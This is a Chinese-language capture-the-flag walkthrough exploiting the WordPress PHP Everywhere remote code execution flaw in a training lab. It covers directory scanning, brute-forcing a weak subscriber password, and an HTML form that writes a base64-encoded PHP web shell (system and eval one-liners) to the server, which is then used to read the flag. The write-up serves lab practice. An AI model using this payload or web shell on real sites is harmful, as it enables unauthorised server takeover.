漏洞介绍
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
启动靶场
笔者镜像链接为:http://eci-2zedttamjkr84ecpucma.cloudeci1.ichunqiu.com/
后序操作请读者自行修改为自己靶场链接。
后台登录网址
首先该网站的信息透露这是一个WordPress博客页面。bing搜索WordPress后台登录页面。
如果没有提示信息,可以登录kali进行目录扫描
dirsearch -u http://eci-2zedttamjkr84ecpucma.cloudeci1.ichunqiu.com/
扫描完成后,发现登录可疑项,进行登录测试,发现登录页面。
登录页面进行burp抓包,并准备实施爆破(春秋靶场提示存在低权限用户存在弱口令注入)。
抓包结束后,准备爆破用户名(burp的具体使用请读者自行学习其他文章)。
根据返回长度,发现用户名为admin和test返回长度异常高,发现用户名为test时,提示为用户名指定的密码不正确,而不是不存在用户,所以低权限用户名为test。尝试test/test,登录成功。
进行漏洞注入
进入F12开发者模式,如图所示,定位到仪表板选项。
<form action="http://eci-2zedttamjkr84ecpucma.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
<input name="action" value="parse-media-shortcode">
<textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsKQGV2YWwoJF9QT1NUWydoYWNrJ10pOyA/Pg==")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute">
</form>
将上述代码,替换为下文
出现下面图片
点击Execute,上传fuck.php文件。
点击1标识,出现success字符。即为注入成功
文件利用
方法一
http://eci-2zedttamjkr84ecpucma.cloudeci1.ichunqiu.com/fuck.php?1=cat%20/flag
拼接语句,/fuck.php?1=cat%20/flag,使用fuck.php文件输出flag。
方法二
查看根目录下的/flag。
php代码解析
上图为fuck.php文件输入内容的base64.decode内容,可以得知,fuck.php中写入了两种一句话木马。